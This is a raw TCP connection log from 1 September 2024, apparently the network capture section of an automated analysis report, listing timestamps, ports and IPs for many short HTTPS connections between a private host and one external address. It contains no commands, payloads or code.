Sep 1, 2024 21:55:43.853642941 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.853662014 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.982161999 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.982207060 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.982280016 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.982693911 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.500720024 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.500755072 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:00.500824928 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.501120090 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.501136065 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:00.546592951 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.546627045 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:00.546741009 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.547041893 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.547054052 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:00.942584991 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:00.953181982 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:00.953202963 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.006071091 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.009416103 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.009433031 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.057343960 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.057521105 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.057528973 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.142182112 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.145576000 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.145589113 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.183198929 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.183237076 CEST	443	49751	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.183326006 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.188060045 CEST	49751	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.188585043 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.188627005 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.188699961 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.189814091 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.189830065 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.283958912 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.284001112 CEST	443	49752	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.284054995 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.284336090 CEST	49752	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.635768890 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.637285948 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.637312889 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.736881018 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737199068 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737224102 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737353086 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737375021 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737384081 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737390041 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737438917 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737448931 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737571001 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737581015 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737726927 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737739086 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737838030 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737848997 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:01.737900019 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:01.737909079 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:02.053195953 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:02.053242922 CEST	443	49753	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:02.053416967 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:02.053597927 CEST	49753	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.783140898 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.783199072 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:10.783263922 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.783624887 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.783655882 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:10.834657907 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.834687948 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:10.834816933 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.836128950 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:10.836143970 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.253366947 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.254909039 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.254941940 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.290815115 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.292304993 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.292327881 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.371880054 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.373626947 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.373640060 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.429769993 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.430068970 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.430097103 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.430485964 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.430507898 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.430594921 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.430629015 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.430708885 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.430726051 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.500046015 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.500088930 CEST	443	49754	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.500137091 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.500461102 CEST	49754	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.760997057 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.761043072 CEST	443	49755	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:11.761126995 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:11.761632919 CEST	49755	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.636914968 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.636962891 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:13.637053967 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.637310028 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.637326956 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:13.791311979 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.791357040 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:13.791497946 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.910742044 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:13.910757065 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.092926979 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.094966888 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.095000029 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.330409050 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.330614090 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.330634117 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.367850065 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.369326115 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.369344950 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.467412949 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.467463017 CEST	443	49756	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.467530012 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.467813969 CEST	49756	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506278992 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506536007 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506562948 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506632090 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506650925 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506675005 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506694078 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506706953 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506716967 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506757975 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506793022 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506850958 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506871939 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.506931067 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.506943941 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.507011890 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.507024050 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.507041931 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.507047892 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.889533997 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.889566898 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:14.889653921 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.889903069 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:14.889916897 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.002727985 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.002778053 CEST	443	49757	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.002939939 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.003282070 CEST	49757	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.444200993 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.445792913 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.445813894 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.579914093 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.580275059 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.580285072 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.690109015 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.690160990 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.690296888 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.690560102 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.690572977 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.719887018 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.719929934 CEST	443	49758	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.720015049 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.720319033 CEST	49758	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.721457958 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.721489906 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:15.721663952 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.721870899 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:15.721883059 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.129498959 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.147732019 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.147763968 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.251455069 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.254858017 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.254874945 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.256500006 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.257563114 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.257582903 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.383498907 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.383886099 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.383909941 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.383999109 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384017944 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.384062052 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384068012 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.384082079 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384089947 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.384202957 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384215117 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.384298086 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384310961 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.384386063 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384397984 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.384438992 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.384448051 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.397228003 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.397264004 CEST	443	49759	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.397461891 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.397818089 CEST	49759	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.399107933 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.399128914 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.401457071 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.401690006 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.401696920 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.703316927 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.703370094 CEST	443	49760	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.703604937 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.703820944 CEST	49760	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.704339027 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.704363108 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.704930067 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.705147028 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.705154896 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.838049889 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.840418100 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.840431929 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.961056948 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:16.961261034 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:16.961268902 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.074600935 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.074640989 CEST	443	49761	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.074717999 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.075259924 CEST	49761	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.076600075 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.076621056 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.076683998 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.076905966 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.076920986 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.174113035 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.175534964 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.175554037 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.294986010 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295320034 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295347929 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295469046 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295474052 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295567036 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295581102 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295660973 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295671940 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295737982 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295749903 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295828104 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295840025 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295905113 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295912027 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.295967102 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.295977116 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.524174929 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.525963068 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.525979996 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.629000902 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.629046917 CEST	443	49762	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.629096031 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.629364967 CEST	49762	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.630718946 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.630734921 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.630803108 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.631071091 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.631082058 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.651663065 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.654042959 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.654052973 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.792376995 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.792414904 CEST	443	49763	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.792475939 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.793107986 CEST	49763	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.797240019 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.797250986 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:17.797302961 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.797581911 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:17.797591925 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.091933966 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.095165968 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.095185995 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.213649988 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214006901 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214026928 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214073896 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214076996 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214097977 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214108944 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214226961 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214237928 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214324951 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214335918 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214407921 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214418888 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214500904 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214512110 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.214569092 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.214577913 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.240530014 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.243077993 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.243093014 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.367727995 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.368515968 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.368537903 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.368685007 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.368706942 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.371679068 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.371702909 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.375848055 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.375865936 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.539161921 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.539206028 CEST	443	49764	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.539294004 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.539788008 CEST	49764	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.540930033 CEST	49766	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.540947914 CEST	443	49766	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.541104078 CEST	49766	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.541506052 CEST	49766	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.541516066 CEST	443	49766	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.695475101 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.695518970 CEST	443	49765	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.695625067 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.695988894 CEST	49765	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.697947025 CEST	49767	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.697964907 CEST	443	49767	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:18.699552059 CEST	49767	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.699760914 CEST	49767	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:18.699767113 CEST	443	49767	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:19.075647116 CEST	443	49766	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:19.081458092 CEST	49766	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:19.081475019 CEST	443	49766	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:19.143753052 CEST	443	49767	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:19.148802042 CEST	49767	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:19.148816109 CEST	443	49767	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:19.211745977 CEST	443	49766	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:19.216073990 CEST	49766	443	192.168.2.4	198.185.159.177
